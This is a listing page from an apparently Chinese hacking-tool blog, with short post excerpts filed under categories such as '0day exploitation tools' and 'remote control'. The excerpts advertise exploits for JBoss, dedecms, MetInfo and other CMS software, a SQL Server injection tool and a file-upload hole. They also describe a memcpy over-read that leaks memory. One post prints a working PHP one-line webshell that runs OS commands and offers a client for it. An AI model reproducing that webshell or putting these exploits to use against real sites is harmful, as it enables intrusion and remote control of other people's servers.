预览模式: 普通 | 列表

【河马】ssh转socks工具--附源代码



【基本简介】 可以简单方便的连接ssh服务器。在SSH服务器用户名和密码处填写对应的用户名和密码,
并选中启动后就链接、掉线后自动连接、启用动态SOCKS,设置完毕后点击保存按钮并点击连接按钮就可以开
始连接啦。

查看更多...

Tags: remote control

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1871

在ssl数据包中有一个数据结构,包含了数据的长度(len)和内容(payload),这个数据结构会经过一次

memcpy,这个函数的最后一个参数为复制的长度len,如果len等于payload的长度,就相安无事,
如果len大于payload的长度就会越界,泄露多出来的那段内存,len是一个无符号整数,最大值为
65535,所有能泄露64k的数据,当payload的长度为0时,泄露最大的内存数据。

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1885


JBoss-4.2.3.GA  invoker code exec 漏洞
成功利用该漏洞可以执行任意命令,包括jsp
webshell等。

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2909

黑客狙击者v1.0



1.将压缩包解压到C:\sniper或D:\sniper目录(目录不存在,自行创建)

2. 切换到软件目录,然后执行:sniper_svc.exe /install 即可

查看更多...

Tags: websmart

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1758


20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))
            {
                ShowMsg("确定软件地址提交正确!", "-1");

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 64 | 引用: 0 | 查看次数: 11696


dedecms 5.7 member_soft_edit.php存在
代码执行漏洞
20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 86 | 引用: 0 | 查看次数: 14108


【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru

查看更多...

Tags: 远程控制

分类:远程控制 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 1667

WebSmart Web应用漏洞扫描器v1.4


   网站应用安全评估系统即是一款用于Web应用远程安全检测的软件产品。
可下载安装,支持Windows操作系统,
用于对自己的网站进行日常的安全检查。
适用对象:网站规模和数量较小的企业、学校、事业单位等。
价格: 6,000元/年 ,3,000元/月,试用30次无限制。

查看更多...

Tags: 扫描器

分类:WebSmart | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 4793

【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru
版本2功能:软件是一个php脚本木马,将<?php $page = $_REQUEST['page'];

查看更多...

Tags: php

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2713

河马SQLServer注入工具v1.2



如果存在php+sqlserver数据库的注入点,或asp+sqlserver数据库的注入点,
或jsp+sqlserver数据库的注入点,就可以利用本工具,查询表,字段,数据,这个工具有一个亮
点是支持cookie
和身份验证。

查看更多...

Tags: sql

分类:SQL注入工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3345

会员上传文件漏洞,可以上传任意后缀

user/swfupload.asp文件漏洞

If UpFileObj.Form("NoReName")="1" Then '不更名

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3104

漏洞文件: img.php
<?php

# MetInfo Enterprise Content Management System

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 10 | 引用: 0 | 查看次数: 3298


歪酷cms2.0版本Search.html存在远程代码执行漏洞,成功利用该漏洞
的攻击者,
能以php进程用户权限执行任意代码。
下载只允许会员下载 该文件只允许会员下载! 登录 | 注册

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2512
无标题文档